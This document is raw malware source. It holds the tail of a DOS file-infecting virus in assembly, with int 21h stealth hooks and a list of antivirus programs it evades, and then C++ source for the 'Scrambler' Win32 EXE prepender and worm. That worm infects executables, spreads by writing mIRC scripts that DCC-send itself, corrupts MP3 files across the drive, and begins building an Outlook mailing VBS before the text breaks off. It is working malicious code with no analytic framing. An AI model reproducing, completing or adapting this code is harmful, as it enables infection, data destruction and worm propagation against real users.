;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz infectz the file ...sub_0E7C proc near
mov bp, spmov ax , 5700h ; gimme file_time_&_datecall sub_0E6Fmov bx , offset file_time_date - pmov [ bx ], cx ; store time_stampmov [ bx +2], dx ; store date_stampcall sub_1157 ; file already infected ?jc short loc_0F0Amov dx , 1Ehcall random_number ; gimme random_numberor dx , dx ; null ?jz short loc_0E9Dmov [ bx ], ax ; nope so store new_time_stamp
loc_0E9D :mov word ptr ds :[ buffer_offset - p], offset overwritten_bytez - pmov dx , 0FFFFhpush dxcall random_number ; gimme random_numbermov ds :[ crypt_viruz_value - p], dx ; store itmov ds :[ crypt_viruz - p__ ], dx ; store itpop dxcall random_number ; gimme next_random_numbermov ds :[ next_crypt_value_ - p], dx ; store itmov ds :[ next_crypt_value - p__ ], dx ; store itcall sub_0E5F ; go2 sofmov cx , 1Ah ; read 1ah_bytezmov dx , offset file_buffer - p; 2 file_bufferpush dx ; (exe_hdr or 3bytez from com)call f_read_ ; read itjc short loc_0F24 ; error ?xchg si , dx ; move thesemov di , offset exe_header - prep movsb ; bytezcall sub_0E68 ; go2 eofmov si , ax ; size in ax : dxmov di , dx ; 2 si : dipop bxcmp word ptr [ bx ], 4D5Ah ; 'MZ' ?je short loc_0EFA ; it'z exe_file ?cmp word ptr [ bx ], 5A4Dh ; 'ZM' ?je short loc_0EFA ; it'z exe_file ?mov byte ptr ds :[ exe_flag - p], 0; nope = clear exe_flagcmp ax , 0EFA6h ; file not 2 big ?cmcjc short loc_0F24mov ax , 3 ; nopecwd ; null dx_regpush bxjmp short loc_0F16
loc_0EFA :mov byte ptr ds :[ exe_flag - p], 1 ; set up exe_flagmov ax , [ bx +4] ; gime page_cntmul word ptr ds :[ page_size_ - p] ; mul it with page_sizesub ax , sisbb dx , di
loc_0F0A :jc short loc_0F24mov ax , [ bx +8] ; gimme hdr_size
mul word ptr ds :[ hdr_size_ - p] ; mul it with hdr_sizepush bxpush axpush dx
loc_0F16 :sub si , ax ; sub hdr_sizesbb di , dx ; or 3 bytez 4 far_jmpor di , di ; file bigger than 0ffffh bytez ?jnz short loc_0F2Cmov dx , si ; nopesub dx , 3E8h ; so check whether the file
loc_0F24 : ; iz not 2 smalljc short loc_0F98cmp dx , 7D0h ; size less than 7d0h ?jbe short loc_0F2F
loc_0F2C :mov dx , 7D0h ; set max_number 2 7d0h
loc_0F2F :call random_number ; gimme random_numberadd dx , 3E8h ; add 7d0h / 2mov ds :[ viruz_start - p], dx ; store viruz_startadd dx , offset buffer - p + 280h ; add dx viruz_size
; + space 4 stackcmp byte ptr ds :[ exe_flag - p], 0 ; exe_file ?je short loc_0F49mov ds :[ file_buffer - p + 10h ], dx ; yope store new exe_sp
loc_0F49 :add dx , 0FD80h ; sub 280hmov ds :[ viruz_end - p], dx ; store viruz_endadd dx , 0 - ( offset buffer - offset loc_08d1 )mov ds :[ beginning_ofs - p], dx ; store beginning_ofsadd dx , 0 - ( offset loc_08d1 - offset loc_0582 ) - 9mov ds :[ max_number - p], dx ; store max_numberadd dx , 8 ; add 8 (viz up - 9 ...)not dx ; make signed_numbermov cx , 0FFFFh ; the f_ptr functionz
; are signed; so it will sub from the eof; cx : dx ...
call sub_0E6Cmov ds :[ mov_cx_?_ - p], dx ; store new_file_pozmov ds :[ mov_dx_?_ - p], ax ; as a base ...cmp byte ptr ds :[ exe_flag - p], 0 ; com_file ?jne short loc_0F81xchg dx , ax ; gimme baseadd dx , 100h ; add 100hjmp short loc_0F8B ; and go on
loc_0F81 :pop dipop sisub ax , si ; count base_addrsbb dx , didiv word ptr ds :[ hdr_size_ - p]
loc_0F8B :add ds :[ viruz_start - p], dx ; add baseadd ds :[ viruz_end - p], dx ; add basepush axpush dxcall sub_0BDB ; ok now prepare decode_rout...
loc_0F98 :jc short loc_0FFE ; error ?pop dx ; and now add basepop ax ; 2 decode_routine_table_
mov cx , 0Ah ; _entryz ...mov si , offset decode_routine_table - p
locloop_0FA2 :add [ si ], dx ; add baseinc si ; go2 next_entryinc siloop locloop_0FA2 ; and go on ...
pop bxcmp byte ptr ds :[ exe_flag - p], 0 ; com_file ?jne short loc_0FD0mov byte ptr [ bx ], 0E9h ; store far_jumpmov ax , ds :[ decode_routine_table - p] ; gimme jump_offsetsub ax , 103h ; sub 103h (100h PSP and 03h
; far_jmp)mov [ bx +1], ax ; store itmov word ptr ds :[ relo_cnt - p], 0; store relo_cntmov word ptr ds :[ relo_cs - p], 0FFF0h; store relo_csmov word ptr ds :[ exe_ip - p], 100h ; store exe_ipjmp short loc_0FF7 ; and go on
loc_0FD0 : ; nope exe_filemov [ bx +16h ], ax ; store relo_csmov [ bx +0Eh], ax ; store relo_ssmov ax , ds :[ decode_routine_table - p] ; gimme starting_ofsmov [ bx +14h ], ax ; store exe_ipadd [ bx +10h ], dx ; add it 2 exe_spmov word ptr [ bx +6], 0 ; null relo_cntmov ax , 28h ; my_min_mem 2 axcmp [ bx +0Ah], ax ; compare it with min_memjae short loc_0FEF ; more ?mov [ bx +0Ah], ax ; yope so store my_min_mem
loc_0FEF :cmp [ bx +0Ch], ax ; compare it with max_memjae short loc_0FF7 ; more ?mov [ bx +0Ch], ax ; yope so store my_max_mem
loc_0FF7 :push bxcall sub_0E68 ; go2 eofdb 0e8h ; call presun_rutiny (
; viruz_body_crypt_&_write)dw offset presun_rutiny - presun_rutiny + buffer - next___
next___ label near ; crypt_ it and write itloc_0FFE :
jc short loc_1031call sub_0E68 ; go2 eofdiv word ptr ds :[ page_size_ - p] ; div new_file_sizeinc ax ; 2 count pagezpop bxcmp byte ptr ds :[ exe_flag - p], 0 ; exe_file ?je short loc_1016mov [ bx +4], ax ; store new page_cntmov [ bx +2], dx ; store new part_pag
loc_1016 :push bxcall sub_0E5F ; go2 sofmov cx , 1Ahpop dxcall f_write_ ; write new_exe_header 2 filejc short loc_1031 ; error ?mov ax , 5701h ; set back file_time_datemov cx , ds :[ file_time_date - p] ; gimme time_stampmov dx , ds :[ file_time_date - p + 2] ; gimme date_stamp
call sub_0E6F ; set itloc_1031 :
mov sp , bpretn ; and end ...
sub_0E7C endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz setz my own error_handlersub_1034 proc near
push dxpush dspush cspop dsmov ax , 3524h ; gimme old_int_24hcall int_21hmov ds :[ old_int_24h - p + 2], es ; store itmov ds :[ old_int_24h - p], bxmov ax , 2524h ; and set my ownmov dx , offset new_int_24h - p__ ; handlercall int_21hpop dspop dxretn ; and end ...
sub_1034 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz setz back old_int_24hsub_1052 proc near
mov ax , 2524hlds dx , dword ptr cs :[ old_int_24h - p] ; gimme old_int_24hcall int_21h ; set it backretn ; and end ...
sub_1052 endp
_com_ db 04h , '.COM' ; offset 105eh_exe_ db 04h , '.EXE' ; offset 1063h_scan_ db 04h , 'SCAN' ; offset 1068h_clean_ db 05h , 'CLEAN' ; offset 106dh_findviru_ db 08h , 'FINDVIRU' ; offset 1073h_guard_ db 05h , 'GUARD' ; offset 107ch_nod_ db 03h , 'NOD' ; offset 1082h_vsafe_ db 05h , 'VSAFE' ; offset 1086h_msav_ db 04h , 'MSAV' ; offset 108ch_chkdsk_ db 06h , 'CHKDSK' ; offset 1091h
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz checkz the file_name and drive ...sub_1098 proc near
push dxpush bxpush cxpush sipush di ; push regzpush dspush es
push axmov si , dx ; gimme file_name_offsetmov di , name_buffer - p ; gimme buffer where 2 storepush cspop eslea bx , [ di - 1]mov cx , 4Bh ; try it 4bh*
locloop_10AD :lodsb ; read bytecmp al , 61h ; 'a'jb short loc_10B8 ; low_case ?cmp al , 7Ah ; 'z'ja short loc_10B8sub al , 20h ; yope so make high_case
loc_10B8 :push axpush si
loc_10BA : ; nopecmp al , 20h ; space ?jne short loc_10C7lodsb ; read byteor al , al ; null ?jnz loc_10BApop si ; yopepop sijmp short loc_10D7 ; end ...
loc_10C7 :pop sipop axcmp al , 5Ch ; '\'je short loc_10D5cmp al , 2Fh ; '/'je short loc_10D5cmp al , 3Ah ; ':'jne short loc_10D7
loc_10D5 :mov bx , di ; store offset 2 bx
loc_10D7 :stosb ; store byteor al , al ; null ?jz short loc_10DEloop locloop_10AD ; and go on
loc_10DE : ; yopemov si , offset _com_ - p ; check 4 .COM or .EXEsub di , 5 ; sub 5 (.XXX, 0)push cspop dscall sub_1149 ; it'z .COM ?jz short loc_10F0call sub_1149 ; it'z .EXE ?jnz short loc_113C
loc_10F0 : ; yopepop axpush axxchg di , bx ; gimme file_name_offsetinc di ; inc it (/, \, or : ...)cmp ax , 4B00h ; fc run file ?jne short loc_1107mov si , offset _chkdsk_ - pcall sub_1149 ; do we run CHKDISK ?jnz short loc_1107
mov byte ptr ds :[ fcb_jmp_ - p], offset loc_121a - ( fcb_jmp_ + 1); yope so turn off fcb_sub_viruz_size
loc_1107 :mov cx , 7 ; check 4 7 antivirusezmov si , offset _scan_ - p ; start with SCAN
locloop_110D :push cxcall sub_1149 ; compare namepop cxjz short loc_113C ; it'z antiviruz ?loop locloop_110D ; nope go on
mov si , offset name_buffer - p ; gimme name_bufferxor bl , bl ; 2 get drivelodswcmp ah, 3Ah ; ':'jne short loc_1125sub al , 40h ; ok make valid_drive_numbermov bl , al ; and store it 2 bl
loc_1125 :mov ax , 4408h ; get drive_statuzcall int_21hor ax , ax ; medium can be exchanged ?
which_jump_? db 74hdb offset loc_1146 - ($ + 1)mov ax , 4409h ; get far disk statuzcall int_21hjc short loc_113C ; error ?test dh, 10h ; iz far disk in net ?jnz short loc_1146
loc_113C :stc ; set error_flag
loc_113D :pop axpop espop dspop dipop si ; restore regzpop cxpop bxpop dxretn ; and end ...
loc_1146 :clc ; clear error_flagjmp short loc_113D ; and end ...
sub_1098 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz comparez 2 stringzsub_1149 proc near
push dilodsb ; gimme bytez_countmov cl , al ; store it 2 cxmov ax , si ; gimme siadd ax , cx ; add bytez_count 2 offsetrepe cmpsb ; comparemov si , ax ; store new_offsetpop diretn ; and end ...
sub_1149 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz checkz whether there'z a viruz in the file or not ...; and if not returnz in ax the value which iz 4 inf ectedsub_1157 proc near
push dxmov ax , es :[ bx +2] ; gimme datexor dx , dxdiv word ptr cs :[ date_div - p] ; div itmov ax , es :[ bx ] ; gimme timeand al , 1Fh ; and itcmp al , dl ; the same ?stc ; set Cflag (infected)jz short loc_1176mov ax , es :[ bx ] ; gimme timeand ax , 0FFE0h ; and itor al , dl ; or it with dateclc ; clear Cflag (not infected)
loc_1176 :pop dxretn ; and end ...
sub_1157 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Sub viruz_sizesub_1178 proc near
sub word ptr es :[ bx ], offset buffer - p; sub viruz_filesbb word ptr es :[ bx +2], 0jnc short loc_ret_118E ; underflow ?add word ptr es :[ bx ], offset buffer - p; yopeadc word ptr es :[ bx +2], 0 ; so add it back
loc_ret_118E :retn
sub_1178 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz iz main infection routine ...sub_118F proc near
push axpush bxpush cxpush si ; push regzpush dipush bppush dspush escall sub_1034 ; set my int_24hmov ax , 4300h ; gimme file_attribzcall int_21hmov cs :[ file_attribz - p], cx ; store itmov ax , 4301h ; set new attribzxor cx , cx ; no attribz
call int_21hjc short loc_11D3 ; error ?mov ax , 3D02h ; open file 4 read_&_writecall int_21hjc short loc_11CA ; error ?push dxpush dspush cspop dspush cspop esmov ds :[ handle - p], ax ; store handlecall sub_0E7C ; ok infect the filemov ah, 3Ehcall sub_0E6F ; close filepop dspop dx
loc_11CA :mov ax , 4301h ; set back old_attribzdb 0b9h ; mov cx, ?
file_attribz dw 20hcall int_21h
loc_11D3 :call sub_1052 ; set back old_int_24hpop espop dspop bppop dipop si ; restore regzpop cxpop bxpop axretn ; and end ...
sub_118F endp
new_int_21h :pushfsticmp ah, 11h ; find_first_FCB_file ?je short loc_11EBcmp ah, 12h ; find next_FCB_file ?jne short loc_121A
loc_11EB :db 0ebh
fcb_jmp_ db 0push bxpush espush axmov ah, 2Fh ; gimme DTA_addrcall int_21hpop axcall int_21h ; do FCB_functioncmp al , 0FFh ; did we find something ?je short loc_1216push ax ; yopecmp byte ptr es :[ bx ], 0FFh ; extended FCB ?jne short loc_1207add bx , 7 ; yope so jump over ext_FCB
loc_1207 :add bx , 17h ; go2 timecall sub_1157 ; check whether infectedpop axjnc short loc_1216 ; already infected ?
add bx , 6 ; go2 file_sizecall sub_1178 ; sub viruz_size
loc_1216 : ; nopepop espop bxpopfiret
loc_121A :cmp ah, 4Eh ; find_first_file ?je short loc_1224cmp ah, 4Fh ; find_next_file ?jne short loc_1250
loc_1224 :push bxpush espush axmov ah, 2Fh ; gimme DTA_addrcall int_21hpop axcall int_21h ; do find_functionjc short loc_1249 ; error ?push axadd bx , 16h ; go2 timecall sub_1157 ; check whether infectedpop axjnc short loc_1242 ; already infected ?add bx , 4 ; go2 file_sizecall sub_1178 ; sub viruz_size
loc_1242 : ; nopepop espop bx ; restore regzpopfclc ; clear error_flagretf 2 ; and end ...
loc_1249 : ; yopepop espop bx ; restore regzpopfstc ; set error_flagretf 2 ; and end ...
loc_1250 :cmp ax , 4B53h ; it'z mark ?jne short loc_125Amov ax , 454Bh ; yope so get 454bhpopfiret ; and end ...
loc_125A :cmp ah, 4Ch ; prog'z_end ?jne short loc_1265mov byte ptr cs :[ fcb_jmp_ - p], 0
loc_1265 :cldpush dxcmp ax , 4B00h ; run_prog ?jne short loc_12A9db 0ebh
run_jmp db offset loc_12a7 - ($ + 1)push axpush bxpush ds ; push regzpush esmov ah, 52h ; gimme list_of_listzcall int_21h
mov ax , es :[ bx - 2] ; gimme first_mcbloc_127B :
mov ds , axadd ax , ds :[ 3] ; go2 next mcb_blockinc axcmp byte ptr ds :[ 0], 5Ah ; last_one ?jne loc_127Bmov bx , cs ; yopecmp ax , bx ; it'z our mcb_block ?jne short loc_129Dmov byte ptr ds :[ 0], 4Dh ; make middle_blockxor ax , axmov ds , axadd word ptr ds :[ 413h ], 4 ; add 4K 2 mem which we took
loc_129D :mov byte ptr cs :[ run_jmp - p], offset loc_12a7 - ( run_jmp + 1)pop es ; now jump 2 loc_12a7pop dspop bx ; restore regzpop ax
loc_12A7 :jmp short loc_12FD
loc_12A9 :cmp ah, 3Dh ; open_file ?je short loc_12FDcmp ah, 56h ; rename_file ?je short loc_12FDcmp ax , 6C00h ; ext_open_found ?jne short loc_12C1test dl , 00010010b ; action 02h or/and 10h ?mov dx , sijz short loc_12FDjmp short loc_1307 ; yope
loc_12C1 :cmp ah, 3Ch ; found_file ?je short loc_1307cmp ah, 5Bh ; make_new_file ?je short loc_1307cmp ah, 3Eh ; close_file ?jne short loc_12F6cmp bx , word ptr cs :[ ext_handle - p] ; do we havejne short loc_12F6 ; something 2 infect ?or bx , bx ; handle is null ?jz short loc_12F6call int_21h ; close itjc short loc_1323push dspush cspop dsmov dx , offset ext_file_name - p; gimme file_namecall sub_118F ; and infect itmov word ptr ds :[ ext_handle - p], 0; nulluj ext_handlepop ds
loc_12F0 :pop dxpopfclc ; clear error_flagretf 2 ; and end ...
loc_12F6 :pop dxpopf ; jmp 2 old_int_21hjmp dword ptr cs :[ old_int_21h - p__ ]
loc_12FD :
call sub_1098 ; check 4 file_name & diskjc loc_12F6 ; error ?call sub_118F ; infect itjmp short loc_12F6
loc_1307 :cmp word ptr cs :[ ext_handle - p], 0jne loc_12F6 ; ext_file already founded ?call sub_1098 ; check 4 file_name & diskjc loc_12F6 ; error ?mov word ptr cs :[ file_offset - p], dx ; store file_name_pop dx ; _offsetpush dxcall int_21h ; found itdb 0bah ; mov dx, ?
file_offset dw 45cchjnc short loc_1329 ; error ?
loc_1323 : ; yopepop dxpopfstc ; set error_flagretf 2 ; and end ...
loc_1329 :push cxpush sipush di ; ok push es ; move file_namexchg si , dx ; 2 our buffermov di , offset ext_handle - ppush cspop esstosw ; and store handle of coursemov cx , 4Bh ; move 4bh bytezrep movsb ; and finally movepop espop dipop si ; restore regzpop cxjmp short loc_12F0 ; and end ...
;db 'Did you leave the room ?';
run_counter dw 04FBhbuffer db 160h dup (?)three_bytez db ? ; offset 14bah
; instr_buffer - 3; 0e9h disp16 haz 3 bytez ...
handle dw ? ; offset 14bbhinstr_buffer db 10 dup (?) ; offset 14bdhfile_buffer db 1ah dup (?) ; offset 14c7hold_int_24h dd ? ; offset 14e1hfile_time_date dd ? ; offset 14e5hext_handle dw ? ; offset 14e9hext_file_name db 4bh dup (?) ; offset 14ebhname_buffer db 4bh dup (?) ; offset 1536h
;seg_a ends
end start
/*Virus Name: ScramblerVersion: BType: Win32 EXE Prepender / I-WormAuthor: GigabyteHomepage: http://gigabyte.coderz.net
*/
#include <iostream>#include <windows.h>#include <direct.h>#include <time.h>
using namespace std ;
char hostfile [ MAX_PATH], CopyHost [ MAX_PATH], Virus [ MAX_PATH];char Buffer [ MAX_PATH], mp3[ MAX_PATH], mp3copy [ MAX_PATH], checksum [ 2];char gbmark [ 2], CopyName[ 10], ScramFile [ MAX_PATH], FullPath [ MAX_PATH];char WinScript [ MAX_PATH], DirToInfect [ MAX_PATH], RepairHost [ MAX_PATH];FILE * scrambler ;
void VirCheck ( char SRCFileName []){
FILE * SRC;char Buffer [ 1];short Counter = 0;int v = 0;SRC = fopen ( SRCFileName , "rb" );if ( SRC){
for ( v = 0; v < 19; v ++){
Counter = fread ( Buffer , 1, 1, SRC);}
strcpy ( checksum , Buffer );
for ( v = 0; v < 1; v ++){
Counter = fread ( Buffer , 1, 1, SRC);}
strcat ( checksum , Buffer );}
fclose ( SRC);}
void WriteVirus ( char SRCFileName [], char DSTFileName []){
FILE * SRC, * DST;char Buffer [ 1024 ];short Counter = 0;int v = 0;SRC = fopen ( SRCFileName , "rb" );if ( SRC){
DST = fopen ( DSTFileName , "wb" );if ( DST){
for ( v = 0; v < 4928 ; v ++){
Counter = fread ( Buffer , 1, 8, SRC);
if ( Counter )fwrite ( Buffer , 1, Counter , DST);
}}
}fclose ( SRC);fclose ( DST);
}
void AddOrig ( char SRCFileName [], char DSTFileName []){
FILE * SRC, * DST;char Buffer [ 1024 ];short Counter = 0;SRC = fopen ( SRCFileName , "rb" );if ( SRC){
DST = fopen ( DSTFileName , "ab" );if ( DST){
while (! feof ( SRC)){
Counter = fread ( Buffer , 1, 1024 , SRC);if ( Counter )fwrite ( Buffer , 1, Counter , DST);
}}
}fclose ( SRC);fclose ( DST);
}
void CopyOrig ( char SRCFileName [], char DSTFileName []){
FILE * SRC, * DST;char Buffer [ 1024 ];short Counter = 0;int v = 0;SRC = fopen ( SRCFileName , "rb" );if ( SRC){
DST = fopen ( DSTFileName , "wb" );if ( DST){
for ( v = 0; v < 4928 ; v ++){
Counter = fread ( Buffer , 1, 8, SRC);if ( Counter )fwrite ( Buffer , 0, 0, DST);
}
while (! feof ( SRC)){
Counter = fread ( Buffer , 1, 1024 , SRC);if ( Counter )fwrite ( Buffer , 1, Counter , DST);
}}
}fclose ( SRC);fclose ( DST);
}
bool FileExists ( char * FileName ){
HANDLE Exists ;Exists = CreateFile ( FileName , GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
OPEN_EXISTING, 0, 0);if ( Exists == INVALID_HANDLE_VALUE)return false ;CloseHandle ( Exists );return true ;
}
void Scramble ( char SRCFileName [], char DSTFileName []){
FILE * SRC, * DST;char Buffer [ 60000 ];Buffer == 0;short Counter = 0;int v = 0;SRC = fopen ( SRCFileName , "rb" );if ( SRC){
DST = fopen ( DSTFileName , "wb" );if ( DST){
for ( v = 0; v < 40; v ++){if (! fseek ( SRC, 204800 , SEEK_CUR)){
Counter = fread ( Buffer , 1, 60000 , SRC);if ( Counter ){
if (! fseek ( DST, 104448 , SEEK_CUR)){fwrite ( Buffer , 1, 60000 , DST);}
}}}
}}fclose ( SRC);fclose ( DST);
}
void ScrambleMP3 ( char FolderSearch []){
WIN32_FIND_DATA FindData ;HANDLE FoundFile ;char FolderSearch2 [ MAX_PATH];strcpy ( FolderSearch2 , FolderSearch );strcat ( FolderSearch2 , "\\*.mp3" );FoundFile = FindFirstFile ( FolderSearch2 , & FindData );
if ( FoundFile != INVALID_HANDLE_VALUE){
do{
if ( FindData . dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY){}
else{
GetWindowsDirectory ( Buffer , MAX_PATH);_chdir ( Buffer );
_chdir ( "system" );
strcpy ( mp3, FolderSearch );strcat ( mp3, "\\" );strcat ( mp3, FindData . cFileName );strcpy ( mp3copy , "mp3.tmp" );CopyFile ( mp3, mp3copy , FALSE);
Scramble ( mp3copy , mp3);_unlink ( mp3copy );}}
while ( FindNextFile ( FoundFile , & FindData ));FindClose ( FoundFile );
}}
void HDDSearch( char Path []){
WIN32_FIND_DATA FindData ;HANDLE FoundFile ;char Path2 [ MAX_PATH], Folder [ MAX_PATH];strcpy ( Path2 , Path );strcat ( Path2 , "\\*.*" );FoundFile = FindFirstFile ( Path2 , & FindData );
if ( FoundFile != INVALID_HANDLE_VALUE){
do{if ( FindData . dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY){
strcpy ( Folder , Path );strcat ( Folder , "\\" );strcat ( Folder , FindData . cFileName );if ( FindData . cFileName [ 0] != '.' ){
HDDSearch( Folder );ScrambleMP3 ( Folder );
}}}while ( FindNextFile ( FoundFile , & FindData ));FindClose ( FoundFile );
}}
void ScriptFile (){
GetWindowsDirectory ( Buffer , MAX_PATH);fprintf ( scrambler , "[script]\nn0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }\nn1=/dcc
send $nick" );fprintf ( scrambler , " %s%csystem%c%s\nn2=}\n" , Buffer , 92, 92, CopyName);
}
void main ( int argc , char ** argv ){
cout << "Scrambler" << endl ;cout << "by Gigabyte" << endl ;
srand ( ( unsigned ) time ( NULL ) );for ( int t = 0; t < 5; t ++)CopyName[ t ] = char ( 97 + ( rand () % 10));CopyName[ 5] = '.' ;
CopyName[ 6] = CopyName[ 8] = 'e' ;CopyName[ 7] = 'x' ;CopyName[ 9] = NULL;
strcpy ( Virus , argv [ 0]);GetWindowsDirectory ( Buffer , MAX_PATH);
strcpy ( FullPath , Buffer );strcat ( FullPath , "\\system\\" );strcat ( FullPath , CopyName);WriteVirus ( Virus , FullPath );
WIN32_FIND_DATA FindData ;HANDLE FoundFile ;
strcat ( DirToInfect , Buffer );strcat ( DirToInfect , "\\*.exe" );FoundFile = FindFirstFile ( DirToInfect , & FindData );
if ( FoundFile != INVALID_HANDLE_VALUE){
do{
if ( FindData . dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY){}
else{
GetWindowsDirectory ( Buffer , MAX_PATH);_chdir ( Buffer );_chdir ( "system" );
strcpy ( hostfile , Buffer );strcat ( hostfile , "\\" );strcat ( hostfile , FindData . cFileName );
VirCheck ( hostfile );
strcpy ( gbmark , "gb" );
if ( FindData . cFileName [ 3] != 'D' ){if ( FindData . cFileName [ 0] != 'P' ){if ( FindData . cFileName [ 0] != 'R' ){if ( FindData . cFileName [ 0] != 'E' ){if ( FindData . cFileName [ 0] != 'T' ){if ( FindData . cFileName [ 0] != 'W' ){if ( FindData . cFileName [ 0] != 'w' ){if ( FindData . cFileName [ 5] != 'R' ){if ( checksum [ 1] != gbmark [ 1]){strcpy ( CopyHost , "host.tmp" );CopyFile ( hostfile , CopyHost , FALSE);
strcpy ( Virus , argv [ 0]);CopyFile ( FullPath , hostfile , FALSE);AddOrig ( CopyHost , hostfile );_unlink ( "host.tmp" );}}}}}}}}}
}}while ( FindNextFile ( FoundFile , & FindData ));FindClose ( FoundFile );
}
if ( FileExists ( "c:\\mirc\\mirc32.exe" )){FoundFile = FindFirstFile ( "c:\\mirc\\download\\*.exe" , & FindData );
if ( FoundFile != INVALID_HANDLE_VALUE){
do{
if ( FindData . dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY){}
else{
_chdir ( Buffer );_chdir ( "system" );
strcpy ( hostfile , "c:\\mirc\\download\\" );strcat ( hostfile , FindData . cFileName );
VirCheck ( hostfile );
strcpy ( gbmark , "gb" );
if ( checksum [ 1] != gbmark [ 1]){strcpy ( CopyHost , "host.tmp" );CopyFile ( hostfile , CopyHost , FALSE);
WriteVirus ( Virus , hostfile );AddOrig ( CopyHost , hostfile );_unlink ( "host.tmp" );}
}}while ( FindNextFile ( FoundFile , & FindData ));FindClose ( FoundFile );
}}
scrambler = fopen ( "c:\\mirc\\script.ini" , "wt" );if ( scrambler ){
ScriptFile ();fclose ( scrambler );
}
scrambler = fopen ( "c:\\PROGRA~1\\mirc\\script.ini" , "wt" );if ( scrambler ){
ScriptFile ();fclose ( scrambler );
}
scrambler = fopen ( "d:\\mirc\\script.ini" , "wt" );if ( scrambler ){
ScriptFile ();fclose ( scrambler );
}
scrambler = fopen ( "d:\\PROGRA~1\\mirc\\script.ini" , "wt" );if ( scrambler ){
ScriptFile ();fclose ( scrambler );
}
scrambler = fopen ( "e:\\mirc\\script.ini" , "wt" );if ( scrambler ){
ScriptFile ();fclose ( scrambler );
}
scrambler = fopen ( "e:\\PROGRA~1\\mirc\\script.ini" , "wt" );if ( scrambler ){
ScriptFile ();fclose ( scrambler );
}
scrambler = fopen ( "f:\\mirc\\script.ini" , "wt" );if ( scrambler ){
ScriptFile ();fclose ( scrambler );
}
scrambler = fopen ( "f:\\PROGRA~1\\mirc\\script.ini" , "wt" );if ( scrambler ){
ScriptFile ();fclose ( scrambler );
}
strcpy ( RepairHost , Buffer );strcat ( RepairHost , "\\system\\hostfile.exe" );CopyOrig ( Virus , RepairHost );
strcpy ( ScramFile , Buffer );strcat ( ScramFile , "\\system\\scram.sys" );if ( FileExists ( ScramFile ) == false )
HDDSearch( "c:" );
strcpy ( WinScript , Buffer );strcat ( WinScript , "\\wscript.exe" );
if ( FileExists ( WinScript )){
if ( FileExists ( "scram.sys" ) == false ){
scrambler = fopen ( "scrambler.vbs" , "wt" );if ( scrambler ){
fprintf ( scrambler , "On Error Resume Next\n" );fprintf ( scrambler , "Dim scrambler, Mail, Counter, A, B, C, D, E, F\n" );
fprintf ( scrambler , "Set scrambler = CreateObject(%coutlook.application %c)\n" ,34, 34);
